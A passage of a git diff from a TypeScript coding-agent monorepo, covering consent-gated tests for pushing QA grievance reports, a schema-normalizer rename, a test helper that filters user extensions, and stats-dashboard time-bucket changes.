?, ?, ?)") + .run("test-model", "test-version", tool, report); + return Number(info.lastInsertRowid); +} + +/** All rows, regardless of pushed state. */ +function selectIds(db: Database): number[] { + return (db.prepare("SELECT id FROM grievances ORDER BY id ASC").all() as Array<{ id: number }>).map(r => r.id); +} + +/** Just unpushed rows — what the next flush would pick up. */ +function selectUnpushedIds(db: Database): number[] { + return (db.prepare("SELECT id FROM grievances WHERE pushed = 0 ORDER BY id ASC").all() as Array<{ id: number }>).map( + r => r.id, + ); +} + +/** Just pushed rows — what's already been shipped. */ +function selectPushedIds(db: Database): number[] { + return (db.prepare("SELECT id FROM grievances WHERE pushed = 1 ORDER BY id ASC").all() as Array<{ id: number }>).map( + r => r.id, + ); +} + +function pushSettings(overrides: Record<string, unknown> = {}): Settings { + return Settings.isolated({ + "dev.autoqa": true, + // Consent is the push opt-in; `granted` is what `resolvePushConfig` + // gates on (or `PI_AUTO_QA_PUSH=1` for headless overrides). + "dev.autoqa.consent": "granted", + "dev.autoqaPush.endpoint": "https://qa.example.com/grievances", + ...overrides, + }); +} + +describe("flushGrievances", () => { + let db: Database; + + beforeEach(() => { + __resetAutoQaFlushStateForTests(); + vi.spyOn(piUtils, "getInstallId").mockReturnValue("11111111-2222-3333-4444-555555555555"); + db = openTempDb(); + }); + + afterEach(() => { + vi.restoreAllMocks(); + __resetAutoQaFlushStateForTests(); + db.close(); + }); + + it("skips network when consent is missing and leaves rows intact", async () => { + insertGrievance(db, "find", "weird ordering"); + const fetchSpy = vi.fn(() => new Response("unexpected", { status: 200 })); + using _hook = hookFetch(fetchSpy); + + // `denied` is the user-facing kill switch for push. + const result = await flushGrievances(db, pushSettings({ "dev.autoqa.consent": "denied" })); + + expect(result).toEqual({ pushed: 0, ok: false, skipped: true }); + expect(fetchSpy).not.toHaveBeenCalled(); + expect(selectIds(db)).toEqual([1]); + }); + + it("skips network when endpoint is missing", async () => { + insertGrievance(db, "find", "weird ordering"); + const fetchSpy = vi.fn(() => new Response("unexpected", { status: 200 })); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings({ "dev.autoqaPush.endpoint": "" })); + + expect(result).toEqual({ pushed: 0, ok: false, skipped: true }); + expect(fetchSpy).not.toHaveBeenCalled(); + expect(selectIds(db)).toEqual([1]); + }); + + it("returns ok without fetching when there is nothing to push", async () => { + const fetchSpy = vi.fn(() => new Response("unexpected", { status: 200 })); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings()); + + expect(result).toEqual({ pushed: 0, ok: true }); + expect(fetchSpy).not.toHaveBeenCalled(); + }); + + it("posts pending rows with bearer header and marks them pushed=1 on 200", async () => { + insertGrievance(db, "find", "weird ordering"); + insertGrievance(db, "read", "selector ignored"); + + let capturedInput: string | URL | Request | undefined; + let capturedInit: RequestInit | undefined; + const fetchSpy = vi.fn((input: string | URL | Request, init: RequestInit | undefined) => { + capturedInput = input; + capturedInit = init; + return new Response("", { status: 200 }); + }); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings({ "dev.autoqaPush.token": "secret-token" })); + + expect(result).toEqual({ pushed: 2, ok: true }); + expect(fetchSpy).toHaveBeenCalledTimes(1); + expect(String(capturedInput)).toBe("https://qa.example.com/grievances"); + expect(capturedInit?.method).toBe("POST"); + + const headers = capturedInit?.headers as Record<string, string> | undefined; + expect(headers?.["content-type"]).toBe("application/json"); + expect(headers?.authorization).toBe("Bearer secret-token"); + + const body = JSON.parse(String(capturedInit?.body)); + expect(body.agent?.name).toBe("omp"); + expect(typeof body.agent?.version).toBe("string"); + expect(body.host).toBeUndefined(); + expect(typeof body.platform).toBe("string"); + expect(typeof body.arch).toBe("string"); + expect(body.installId).toBe("11111111-2222-3333-4444-555555555555"); + expect(body.entries).toEqual([ + { id: 1, model: "test-model", version: "test-version", tool: "find", report: "weird ordering" }, + { id: 2, model: "test-model", version: "test-version", tool: "read", report: "selector ignored" }, + ]); + + // Rows are retained for inspection — `pushed=1` flips, but the data + // stays so users can browse what they've shipped via `omp grievances`. + expect(selectIds(db)).toEqual([1, 2]); + expect(selectPushedIds(db)).toEqual([1, 2]); + expect(selectUnpushedIds(db)).toEqual([]); + }); + + it("omits the Authorization header when no token is configured", async () => { + insertGrievance(db, "find", "no token here"); + let capturedInit: RequestInit | undefined; + const fetchSpy = vi.fn((_input: string | URL | Request, init: RequestInit | undefined) => { + capturedInit = init; + return new Response("", { status: 204 }); + }); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings()); + + expect(result).toEqual({ pushed: 1, ok: true }); + const headers = capturedInit?.headers as Record<string, string> | undefined; + expect(headers?.authorization).toBeUndefined(); + expect(selectUnpushedIds(db)).toEqual([]); + expect(selectPushedIds(db)).toEqual([1]); + }); + + it("leaves rows unpushed on 5xx and reports failure", async () => { + insertGrievance(db, "find", "boom"); + const fetchSpy = vi.fn(() => new Response("nope", { status: 500 })); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings()); + + expect(result).toEqual({ pushed: 0, ok: false }); + expect(fetchSpy).toHaveBeenCalledTimes(1); + expect(selectUnpushedIds(db)).toEqual([1]); + expect(selectPushedIds(db)).toEqual([]); + }); + + it("drains mid-flight inserts in a follow-up batch within the same loop", async () => { + insertGrievance(db, "find", "first"); + + const fetchEntered = Promise.withResolvers<void>(); + const releaseFirstFetch = Promise.withResolvers<Response>(); + let fetchCount = 0; + const fetchSpy = vi.fn(() => { + fetchCount += 1; + if (fetchCount === 1) { + fetchEntered.resolve(); + return releaseFirstFetch.promise; + } + // Subsequent loop iterations resolve immediately so the worker + // finishes draining without manual coordination per batch. + return Promise.resolve(new Response("", { status: 200 })); + }); + using _hook = hookFetch(fetchSpy); + + const flushPromise = flushGrievances(db, pushSettings()); + await fetchEntered.promise; + + // New grievance written by a concurrent tool call while the push is in flight. + insertGrievance(db, "read", "second"); + + releaseFirstFetch.resolve(new Response("", { status: 200 })); + const result = await flushPromise; + + // Both rows shipped — the worker looped, the second batch picked up + // the row that landed mid-flight. + expect(result).toEqual({ pushed: 2, ok: true }); + expect(fetchSpy).toHaveBeenCalledTimes(2); + expect(selectUnpushedIds(db)).toEqual([]); + expect(selectPushedIds(db)).toEqual([1, 2]); + }); + + it("collapses concurrent callers onto a single in-flight push", async () => { + insertGrievance(db, "find", "single-flight"); + + const releaseFetch = Promise.withResolvers<Response>(); + const fetchSpy = vi.fn(() => releaseFetch.promise); + using _hook = hookFetch(fetchSpy); + + const settings = pushSettings(); + const first = flushGrievances(db, settings); + const second = flushGrievances(db, settings); + + releaseFetch.resolve(new Response("", { status: 200 })); + const [a, b] = await Promise.all([first, second]); + + expect(fetchSpy).toHaveBeenCalledTimes(1); + expect(a).toEqual({ pushed: 1, ok: true }); + expect(b).toBe(a); + expect(selectUnpushedIds(db)).toEqual([]); + expect(selectPushedIds(db)).toEqual([1]); + }); + + it("skips the next push within the failure cooldown window", async () => { + insertGrievance(db, "find", "first"); + const fetchSpy = vi.fn(() => new Response("nope", { status: 500 })); + using _hook = hookFetch(fetchSpy); + + const settings = pushSettings(); + const firstResult = await flushGrievances(db, settings); + const secondResult = await flushGrievances(db, settings); + + expect(firstResult).toEqual({ pushed: 0, ok: false }); + expect(secondResult).toEqual({ pushed: 0, ok: false, skipped: true }); + expect(fetchSpy).toHaveBeenCalledTimes(1); + expect(selectUnpushedIds(db)).toEqual([1]); + }); + + it("drains a backlog larger than the batch size in multiple POSTs", async () => { + // Seed >1 batch worth (FLUSH_BATCH_SIZE = 50) so the worker has to loop. + // 127 chosen to land on a non-multiple boundary (2 full batches + a + // partial final one), exercising both the LIMIT semantics and the + // "remainder smaller than batch" tail. + const total = 127; + for (let i = 0; i < total; i++) insertGrievance(db, "find", `report-${i}`); + + const seenBatchSizes: number[] = []; + const fetchSpy = vi.fn((_input: string | URL | Request, init: RequestInit | undefined) => { + const body = JSON.parse(String(init?.body)) as { entries: unknown[] }; + seenBatchSizes.push(body.entries.length); + return new Response("", { status: 200 }); + }); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings()); + + expect(result).toEqual({ pushed: total, ok: true }); + // Three batches: 50 + 50 + 27. + expect(seenBatchSizes).toEqual([50, 50, 27]); + expect(fetchSpy).toHaveBeenCalledTimes(3); + expect(selectUnpushedIds(db)).toEqual([]); + expect(selectPushedIds(db).length).toBe(total); + }); + + it("stops the loop on a mid-batch failure and preserves unpushed rows", async () => { + // Two batches' worth — first batch ships, second batch errors. The + // pushed-so-far count surfaces in the result and only the unsent + // rows stay flagged unpushed. + const firstBatch = 50; + const secondBatch = 10; + for (let i = 0; i < firstBatch + secondBatch; i++) insertGrievance(db, "find", `r-${i}`); + + let call = 0; + const fetchSpy = vi.fn(() => { + call += 1; + return new Response("", { status: call === 1 ? 200 : 500 }); + }); + using _hook = hookFetch(fetchSpy); + + const result = await flushGrievances(db, pushSettings()); + + expect(result).toEqual({ pushed: firstBatch, ok: false }); + expect(fetchSpy).toHaveBeenCalledTimes(2); + expect(selectPushedIds(db).length).toBe(firstBatch); + expect(selectUnpushedIds(db).length).toBe(secondBatch); + }); +}); diff --git a/packages/coding-agent/test/tools/resolve.test.ts b/packages/coding-agent/test/tools/resolve.test.ts index e93569fa0..14573934c 100644 --- a/packages/coding-agent/test/tools/resolve.test.ts +++ b/packages/coding-agent/test/tools/resolve.test.ts @@ -3,7 +3,7 @@ import { Settings } from "@oh-my-pi/pi-coding-agent/config/settings"; import { getThemeByName } from "@oh-my-pi/pi-coding-agent/modes/theme/theme"; import type { ToolSession } from "@oh-my-pi/pi-coding-agent/tools"; import { ResolveTool, resolveToolRenderer } from "@oh-my-pi/pi-coding-agent/tools/resolve"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import * as z from "zod/v4"; function createSession(handler?: (input: unknown) => Promise<unknown>): ToolSession { diff --git a/packages/coding-agent/test/tools/schema-validation.test.ts b/packages/coding-agent/test/tools/schema-validation.test.ts index 5bf9b118e..4bfdc2ae1 100644 --- a/packages/coding-agent/test/tools/schema-validation.test.ts +++ b/packages/coding-agent/test/tools/schema-validation.test.ts @@ -1,12 +1,12 @@ import { describe, expect, it } from "bun:test"; -import { sanitizeSchemaForGoogle } from "@oh-my-pi/pi-ai"; +import { normalizeSchemaForGoogle } from "@oh-my-pi/pi-ai"; import { Settings } from "@oh-my-pi/pi-coding-agent/config/settings"; import { createTools, HIDDEN_TOOLS, type ToolSession } from "@oh-my-pi/pi-coding-agent/tools"; /** * Problematic JSON Schema features that cause issues with various providers. * - * These are checked AFTER sanitization (sanitizeSchemaForGoogle) is applied, + * These are checked AFTER sanitization (normalizeSchemaForGoogle) is applied, * so features like `const` that are transformed by sanitization are not flagged. * * Prohibited (error): @@ -32,7 +32,7 @@ const PROHIBITED_KEYS = new Set([ "prefixItems", "unevaluatedProperties", "unevaluatedItems", - "const", // Should be converted to enum by sanitizeSchemaForGoogle + "const", // Should be converted to enum by normalizeSchemaForGoogle "examples", ]); @@ -61,7 +61,9 @@ function validateSchema(schema: unknown, path = "root"): SchemaViolation[] { const obj = schema as Record<string, unknown>; - for (const [key, value] of Object.entries(obj)) { + for (const key in obj) { + if (!Object.hasOwn(obj, key)) continue; + const value = obj[key]; const currentPath = `${path}.${key}`; if (PROHIBITED_KEYS.has(key)) { @@ -113,22 +115,22 @@ function createTestSession(): ToolSession { }; } -describe("sanitizeSchemaForGoogle", () => { +describe("normalizeSchemaForGoogle", () => { it("converts const to enum", () => { const schema = { type: "string", const: "active" }; - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); expect(sanitized).toEqual({ type: "string", enum: ["active"] }); }); it("merges const into existing enum", () => { const schema = { type: "string", const: "active", enum: ["inactive"] }; - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); expect(sanitized).toEqual({ type: "string", enum: ["inactive", "active"] }); }); it("does not duplicate const in enum", () => { const schema = { type: "string", const: "active", enum: ["active", "inactive"] }; - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); expect(sanitized).toEqual({ type: "string", enum: ["active", "inactive"] }); }); @@ -139,7 +141,7 @@ describe("sanitizeSchemaForGoogle", () => { { type: "string", const: "dir" }, ], }; - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); // anyOf with all const values should collapse into a single enum expect(sanitized).toEqual({ type: "string", @@ -159,7 +161,7 @@ describe("sanitizeSchemaForGoogle", () => { }, }, }; - const sanitized = sanitizeSchemaForGoogle(schema) as Record<string, unknown>; + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; const props = sanitized.properties as Record<string, unknown>; const nested = props.nested as Record<string, unknown>; const nestedProps = nested.properties as Record<string, unknown>; @@ -175,11 +177,11 @@ describe("sanitizeSchemaForGoogle", () => { description: "A description", minLength: 1, }; - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); expect(sanitized).toEqual({ type: "string", enum: ["value"], - description: "A description", + description: "A description\n\n{minLength: 1}", }); }); @@ -188,17 +190,17 @@ describe("sanitizeSchemaForGoogle", () => { type: "array", items: { type: "string", const: "only" }, }; - const sanitized = sanitizeSchemaForGoogle(schema) as Record<string, unknown>; + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; const items = sanitized.items as Record<string, unknown>; expect(items.const).toBeUndefined(); expect(items.enum).toEqual(["only"]); }); it("passes through primitives unchanged", () => { - expect(sanitizeSchemaForGoogle("string")).toBe("string"); - expect(sanitizeSchemaForGoogle(123)).toBe(123); - expect(sanitizeSchemaForGoogle(true)).toBe(true); - expect(sanitizeSchemaForGoogle(null)).toBe(null); + expect(normalizeSchemaForGoogle("string")).toBe("string"); + expect(normalizeSchemaForGoogle(123)).toBe(123); + expect(normalizeSchemaForGoogle(true)).toBe(true); + expect(normalizeSchemaForGoogle(null)).toBe(null); }); it("preserves property names that match schema keywords (e.g., 'pattern')", () => { @@ -210,7 +212,7 @@ describe("sanitizeSchemaForGoogle", () => { }, required: ["pattern"], }; - const sanitized = sanitizeSchemaForGoogle(schema) as Record<string, unknown>; + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; const props = sanitized.properties as Record<string, unknown>; expect(props.pattern).toEqual({ type: "string", description: "The search pattern" }); expect(props.format).toEqual({ type: "string", description: "Output format" }); @@ -224,7 +226,7 @@ describe("sanitizeSchemaForGoogle", () => { format: "email", minLength: 1, }; - const sanitized = sanitizeSchemaForGoogle(schema) as Record<string, unknown>; + const sanitized = normalizeSchemaForGoogle(schema) as Record<string, unknown>; expect(sanitized.pattern).toBeUndefined(); expect(sanitized.format).toBeUndefined(); expect(sanitized.minLength).toBeUndefined(); @@ -244,7 +246,7 @@ describe("tool schema validation (post-sanitization)", () => { if (!schema) continue; // Apply the same sanitization that happens before sending to providers - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); const violations = validateSchema(sanitized, tool.name); const errors = violations.filter(v => v.severity === "error"); @@ -270,14 +272,15 @@ describe("tool schema validation (post-sanitization)", () => { it("hidden tools also have valid sanitized schemas", async () => { const session = createTestSession(); - for (const [name, factory] of Object.entries(HIDDEN_TOOLS)) { - const tool = await factory(session); + for (const name in HIDDEN_TOOLS) { + if (!Object.hasOwn(HIDDEN_TOOLS, name)) continue; + const tool = await HIDDEN_TOOLS[name](session); if (!tool) continue; const schema = tool.parameters; if (!schema) continue; - const sanitized = sanitizeSchemaForGoogle(schema); + const sanitized = normalizeSchemaForGoogle(schema); const violations = validateSchema(sanitized, name); const errors = violations.filter(v => v.severity === "error"); diff --git a/packages/coding-agent/test/tools/search-renderer.test.ts b/packages/coding-agent/test/tools/search-renderer.test.ts index a9a7fbaff..b3b2d0944 100644 --- a/packages/coding-agent/test/tools/search-renderer.test.ts +++ b/packages/coding-agent/test/tools/search-renderer.test.ts @@ -1,5 +1,5 @@ import { describe, expect, it } from "bun:test"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { getThemeByName } from "../../src/modes/theme/theme"; import { searchToolRenderer } from "../../src/tools/search"; diff --git a/packages/coding-agent/test/tools/task-simple-mode.test.ts b/packages/coding-agent/test/tools/task-simple-mode.test.ts index 3b76a8aa9..16690b425 100644 --- a/packages/coding-agent/test/tools/task-simple-mode.test.ts +++ b/packages/coding-agent/test/tools/task-simple-mode.test.ts @@ -31,12 +31,6 @@ function getSchemaProperties(tool: TaskTool): Record<string, unknown> { return wire.properties ?? {}; } -function getAssignmentDescription(tool: TaskTool): string { - const properties = getSchemaProperties(tool); - const tasks = properties.tasks as { items?: { properties?: Record<string, { description?: string }> } } | undefined; - return tasks?.items?.properties?.assignment?.description ?? ""; -} - function getFirstText(result: { content: Array<{ type: string; text?: string }> }): string { const content = result.content.find(part => part.type === "text"); return content?.type === "text" ? (content.text ?? "") : ""; @@ -61,7 +55,6 @@ describe("task.simple", () => { expect(tool.description).toContain("`context` or `assignment`"); expect(tool.description).toContain("- `context`:"); expect(tool.description).not.toContain("- `schema`:"); - expect(getAssignmentDescription(tool)).toContain("shared background belongs in `context`"); }); it("removes both context and schema inputs in independent mode", async () => { @@ -78,7 +71,6 @@ describe("task.simple", () => { expect(tool.description).toContain("each `assignment`"); expect(tool.description).not.toContain("- `context`:"); expect(tool.description).not.toContain("- `schema`:"); - expect(getAssignmentDescription(tool)).toContain("include any background that would otherwise live in `context`"); }); it("rejects direct schema and context fields when the mode disables them", async () => { diff --git a/packages/coding-agent/test/tools/yield.test.ts b/packages/coding-agent/test/tools/yield.test.ts index a067d47eb..5db0a317c 100644 --- a/packages/coding-agent/test/tools/yield.test.ts +++ b/packages/coding-agent/test/tools/yield.test.ts @@ -475,7 +475,13 @@ describe("YieldTool", () => { }), ); - expect(tool.strict).toBe(true); + // Object-valued enums cannot be reduced to a single `type` keyword, so + // strict mode falls back to non-strict — that's the strict-mode + // contract, separately exercised in `schema-strict-mode.test.ts`. What + // this test guards is that the literal `$ref: "literal"` inside the + // enum value is treated as opaque data (not mistaken for an unresolved + // schema reference that would discard the enum entirely). + expect(tool.strict).toBe(false); const result = await tool.execute("call-literal-ref-enum", { result: { data: { $ref: "literal" } }, } as never); diff --git a/packages/coding-agent/test/utils/filter-user-extensions.ts b/packages/coding-agent/test/utils/filter-user-extensions.ts index 2a386108b..a547aae16 100644 --- a/packages/coding-agent/test/utils/filter-user-extensions.ts +++ b/packages/coding-agent/test/utils/filter-user-extensions.ts @@ -1,12 +1,22 @@ -import * as path from "node:path"; -import { getAgentDir } from "@oh-my-pi/pi-utils"; +import { getAgentDir, getConfigRootDir, getPluginsDir, pathIsWithin } from "@oh-my-pi/pi-utils"; -export function filterUserExtensions<T extends { path: string }>(extensions: T[]): T[] { - const userExtensionsDir = path.join(getAgentDir(), "extensions"); - return extensions.filter(ext => !ext.path.startsWith(userExtensionsDir)); -} - -export function filterUserExtensionErrors<T extends { path: string }>(errors: T[]): T[] { - const userExtensionsDir = path.join(getAgentDir(), "extensions"); - return errors.filter(err => !err.path.startsWith(userExtensionsDir)); +// Drop every extension discovered from the user's machine so each test only +// sees what it wrote into the per-test temp project dir. Production composes +// the user-extension list from three independent roots, any one of which can +// leak entries on a contributor's box: +// +// 1. `getConfigRootDir()` (`~/.omp`) +// Catches the native builtin provider's settings.json-declared extensions +// that resolve outside the `agent/extensions/` subtree (e.g. an absolute +// or `../`-relative entry pointing somewhere else under `~/.omp/`), plus +// the legacy non-XDG `~/.omp/plugins` tree on hosts without XDG dirs. +// 2. `getAgentDir()` (`~/.omp/agent` or `$PI_CODING_AGENT_DIR`) +// Handles `PI_CODING_AGENT_DIR` overrides that relocate the agent dir +// (and therefore `agent/extensions/`) out from under the config root. +// 3. `getPluginsDir()` (XDG-aware: `$XDG_DATA_HOME/omp/plugins` or legacy) +// Handles installed plugin extensions that live outside `~/.omp` when +// XDG_DATA_HOME resolves the plugins dir somewhere else. +export function filterUserScoped<T extends { path: string }>(items: T[]): T[] { + const prefixes = [getConfigRootDir(), getAgentDir(), getPluginsDir()]; + return items.filter(it => !prefixes.some(prefix => pathIsWithin(prefix, it.path))); } diff --git a/packages/natives/native/index.d.ts b/packages/natives/native/index.d.ts index 7153c09d6..0b59e0bd8 100644 --- a/packages/natives/native/index.d.ts +++ b/packages/natives/native/index.d.ts @@ -1154,12 +1154,6 @@ export interface PtyStartOptions { */ export declare function readImageFromClipboard(): Promise<ClipboardImage | undefined | null> -/** - * Strip ANSI escape sequences, remove control characters / lone surrogates, - * and normalize line endings. - */ -export declare function sanitizeText(text: string): string - /** * Search content for a pattern (one-shot, compiles pattern each time). * For repeated searches with the same pattern, use [`grep`] with file filters. diff --git a/packages/natives/native/index.js b/packages/natives/native/index.js index 965e0d7f3..568dd0887 100644 --- a/packages/natives/native/index.js +++ b/packages/natives/native/index.js @@ -56,7 +56,6 @@ export const matchesLegacySequence = nativeBindings.matchesLegacySequence; export const parseKey = nativeBindings.parseKey; export const parseKittySequence = nativeBindings.parseKittySequence; export const readImageFromClipboard = nativeBindings.readImageFromClipboard; -export const sanitizeText = nativeBindings.sanitizeText; export const search = nativeBindings.search; export const sliceWithWidth = nativeBindings.sliceWithWidth; export const summarizeCode = nativeBindings.summarizeCode; diff --git a/packages/natives/test/native.test.ts b/packages/natives/test/native.test.ts index b67bf3325..bdb1cb14c 100644 --- a/packages/natives/test/native.test.ts +++ b/packages/natives/test/native.test.ts @@ -15,7 +15,6 @@ import { listWorkspace, MacOSPowerAssertion, PtySession, - sanitizeText, summarizeCode, truncateToWidth, visibleWidth, @@ -523,14 +522,14 @@ describe("pi-natives", () => { await fs.rm(markerPath, { force: true }); const result = await executeShell({ - command: `{ sleep 2; echo done > '${markerEscaped}'; } & sleep 10`, + command: `{ sleep 0.15; echo done > '${markerEscaped}'; } & sleep 10`, cwd: testDir, - timeoutMs: 100, + timeoutMs: 50, }); expect(result.timedOut).toBe(true); - await Bun.sleep(3000); + await Bun.sleep(500); expect(await Bun.file(markerPath).exists()).toBe(false); }); }); @@ -584,28 +583,11 @@ describe("pi-natives", () => { }); }); - describe("sanitizeText", () => { - it("should strip ANSI, remove control chars and normalize CR", () => { - const input = "\x1b[31mred\x1b[0m\ra\u0000b\tline\ncarriage\r\u0001\u0085"; - expect(sanitizeText(input)).toBe("redab\tline\ncarriage"); - }); - - it("should remove lone surrogates but keep valid pairs", () => { - expect(sanitizeText(`a\ud800b\udc00c`)).toBe("abc"); - const validPair = "a\u{1f600}b"; - expect(sanitizeText(validPair)).toBe(validPair); - }); - - it("should strip OSC sequences", () => { - const input = "\x1b]0;title\x07hello"; - expect(sanitizeText(input)).toBe("hello"); - }); - describe("MacOSPowerAssertion", () => { - it("should create a stoppable power assertion handle", () => { - const assertion = MacOSPowerAssertion.start({ reason: "pi-natives test" }); - assertion.stop(); - assertion.stop(); - }); + describe("MacOSPowerAssertion", () => { + it("should create a stoppable power assertion handle", () => { + const assertion = MacOSPowerAssertion.start({ reason: "pi-natives test" }); + assertion.stop(); + assertion.stop(); }); }); }); diff --git a/packages/stats/src/aggregator.ts b/packages/stats/src/aggregator.ts index 610303eee..a58125cce 100644 --- a/packages/stats/src/aggregator.ts +++ b/packages/stats/src/aggregator.ts @@ -266,7 +266,9 @@ interface TimeRangeConfig { timeSeriesHours: number; timeSeriesBucketMs: number; modelSeriesDays: number; + modelSeriesBucketMs: number; modelPerformanceDays: number; + modelPerformanceBucketMs: number; costSeriesDays: number; cutoff: number | null; } @@ -278,42 +280,54 @@ const TIME_RANGE_TO_CONFIG: Record<TimeRange, Omit<TimeRangeConfig, "cutoff">> = timeSeriesHours: 1, timeSeriesBucketMs: HOUR_MS, modelSeriesDays: 1, + modelSeriesBucketMs: HOUR_MS, modelPerformanceDays: 1, + modelPerformanceBucketMs: HOUR_MS, costSeriesDays: 1, }, "24h": { timeSeriesHours: 24, timeSeriesBucketMs: HOUR_MS, modelSeriesDays: 1, + modelSeriesBucketMs: HOUR_MS, modelPerformanceDays: 1, + modelPerformanceBucketMs: HOUR_MS, costSeriesDays: 1, }, "7d": { timeSeriesHours: 24 * 7, timeSeriesBucketMs: DAY_MS, modelSeriesDays: 7, + modelSeriesBucketMs: DAY_MS, modelPerformanceDays: 7, + modelPerformanceBucketMs: DAY_MS, costSeriesDays: 7, }, "30d": { timeSeriesHours: 24 * 30, timeSeriesBucketMs: DAY_MS, modelSeriesDays: 30, + modelSeriesBucketMs: DAY_MS, modelPerformanceDays: 30, + modelPerformanceBucketMs: DAY_MS, costSeriesDays: 30, }, "90d": { timeSeriesHours: 24 * 90, timeSeriesBucketMs: DAY_MS, modelSeriesDays: 90, + modelSeriesBucketMs: DAY_MS, modelPerformanceDays: 90, + modelPerformanceBucketMs: DAY_MS, costSeriesDays: 90, }, all: { timeSeriesHours: 24 * 3650, timeSeriesBucketMs: DAY_MS, modelSeriesDays: 3650, + modelSeriesBucketMs: DAY_MS, modelPerformanceDays: 3650, + modelPerformanceBucketMs: DAY_MS, costSeriesDays: 3650, }, }; @@ -338,16 +352,24 @@ function getTimeRangeConfig(range?: string | null): TimeRangeConfig { */ export async function getDashboardStats(range?: string | null): Promise<DashboardStats> { await initDb(); - const { timeSeriesHours, timeSeriesBucketMs, modelSeriesDays, modelPerformanceDays, costSeriesDays, cutoff } = - getTimeRangeConfig(range); + const { + timeSeriesHours, + timeSeriesBucketMs, + modelSeriesDays, + modelSeriesBucketMs, + modelPerformanceDays, + modelPerformanceBucketMs, + costSeriesDays, + cutoff, + } = getTimeRangeConfig(range); return { overall: getOverallStats(cutoff ?? undefined), byModel: getStatsByModel(cutoff ?? undefined), byFolder: getStatsByFolder(cutoff ?? undefined), timeSeries: getTimeSeries(timeSeriesHours, cutoff, timeSeriesBucketMs), - modelSeries: getModelTimeSeries(modelSeriesDays, cutoff), - modelPerformanceSeries: getModelPerformanceSeries(modelPerformanceDays, cutoff), + modelSeries: getModelTimeSeries(modelSeriesDays, cutoff, modelSeriesBucketMs), + modelPerformanceSeries: getModelPerformanceSeries(modelPerformanceDays, cutoff, modelPerformanceBucketMs), costSeries: getCostTimeSeries(costSeriesDays, cutoff), }; } @@ -366,12 +388,13 @@ export async function getModelDashboardStats( range?: string | null, ): Promise<Pick<DashboardStats, "byModel" | "modelSeries" | "modelPerformanceSeries">> { await initDb(); - const { modelSeriesDays, modelPerformanceDays, cutoff } = getTimeRangeConfig(range); + const { modelSeriesDays, modelSeriesBucketMs, modelPerformanceDays, modelPerformanceBucketMs, cutoff } = + getTimeRangeConfig(range); return { byModel: getStatsByModel(cutoff ?? undefined), - modelSeries: getModelTimeSeries(modelSeriesDays, cutoff), - modelPerformanceSeries: getModelPerformanceSeries(modelPerformanceDays, cutoff), + modelSeries: getModelTimeSeries(modelSeriesDays, cutoff, modelSeriesBucketMs), + modelPerformanceSeries: getModelPerformanceSeries(modelPerformanceDays, cutoff, modelPerformanceBucketMs), }; } diff --git a/packages/stats/src/client/App.tsx b/packages/stats/src/client/App.tsx index 6c99ab615..bf1fb9ac4 100644 --- a/packages/stats/src/client/App.tsx +++ b/packages/stats/src/client/App.tsx @@ -155,10 +155,11 @@ export default function App() { <div className="space-y-6 animate-fade-in"> {modelStats ? ( <> - <ChartsContainer modelSeries={modelStats.modelSeries} /> + <ChartsContainer modelSeries={modelStats.modelSeries} timeRange={timeRange} /> <ModelsTable models={modelStats.byModel} performanceSeries={modelStats.modelPerformanceSeries} + timeRange={timeRange} /> </> ) : ( diff --git a/packages/stats/src/client/components/ChartsContainer.tsx b/packages/stats/src/client/components/ChartsContainer.tsx index 74b0c80a9..d63fb5a67 100644 --- a/packages/stats/src/client/components/ChartsContainer.tsx +++ b/packages/stats/src/client/components/ChartsContainer.tsx @@ -9,11 +9,11 @@ import { Title, Tooltip, } from "chart.js"; -import { format } from "date-fns"; import { useMemo } from "react"; import { Line } from "react-chartjs-2"; -import type { ModelTimeSeriesPoint } from "../types"; +import type { ModelTimeSeriesPoint, TimeRange } from "../types"; import { useSystemTheme } from "../useSystemTheme"; +import { formatRangeTick, rangeMeta } from "./range-meta"; ChartJS.register(CategoryScale, LinearScale, PointElement, LineElement, Title, Tooltip, Legend, Filler); @@ -49,14 +49,16 @@ const CHART_THEMES = { } as const; interface ChartsContainerProps { modelSeries: ModelTimeSeriesPoint[]; + timeRange: TimeRange; } -export function ChartsContainer({ modelSeries }: ChartsContainerProps) { +export function ChartsContainer({ modelSeries, timeRange }: ChartsContainerProps) { const chartData = useMemo(() => buildModelPreferenceSeries(modelSeries), [modelSeries]); const theme = useSystemTheme(); const chartTheme = CHART_THEMES[theme]; + const meta = rangeMeta(timeRange); const data = { - labels: chartData.data.map(d => format(new Date(d.timestamp), "MMM d")), + labels: chartData.data.map(d => formatRangeTick(d.timestamp, timeRange)), datasets: chartData.series.map((seriesName, index) => ({ label: seriesName, data: chartData.data.map(d => d[seriesName] ?? 0), @@ -137,7 +139,7 @@ export function ChartsContainer({ modelSeries }: ChartsContainerProps) { <div className="surface overflow-hidden"> <div className="px-5 py-4 border-b border-[var(--border-subtle)]"> <h3 className="text-sm font-semibold text-[var(--text-primary)]">Model Preference</h3> - <p className="text-xs text-[var(--text-muted)] mt-1">Share of requests over the last 14 days</p> + <p className="text-xs text-[var(--text-muted)] mt-1">Share of requests over {meta.windowLabel}</p> </div> <div className="p-5 min-h-[320px]"> {chartData.data.length === 0 ? ( diff --git a/packages/stats/src/client/components/ModelsTable.tsx b/packages/stats/src/client/components/ModelsTable.tsx index 4f0fa629f..be83010e6 100644 --- 